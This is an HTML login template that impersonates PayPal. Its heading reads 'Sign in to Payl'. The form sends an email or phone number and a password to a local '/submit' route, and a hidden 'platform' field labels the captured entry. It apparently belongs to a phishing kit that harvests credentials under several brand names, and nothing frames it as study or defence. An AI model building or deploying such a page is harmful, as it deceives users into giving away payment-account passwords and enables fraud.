<!DOCTYPE html>
<html>
<head>
    <title>Paypal</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
</head>
<body>
    <h2>Sign in to Payl</h2>
    <form action="/submit" method="POST">
        <input type="hidden" name="platform" value="Paypal">
        <label>Email or Phone</label><br>
        <input type="text" name="username" required><br>
        <label>Password</label><br>
        <input type="password" name="password" required><br>
        <button type="submit">Sign In</button>
    </form>
</body>
</html>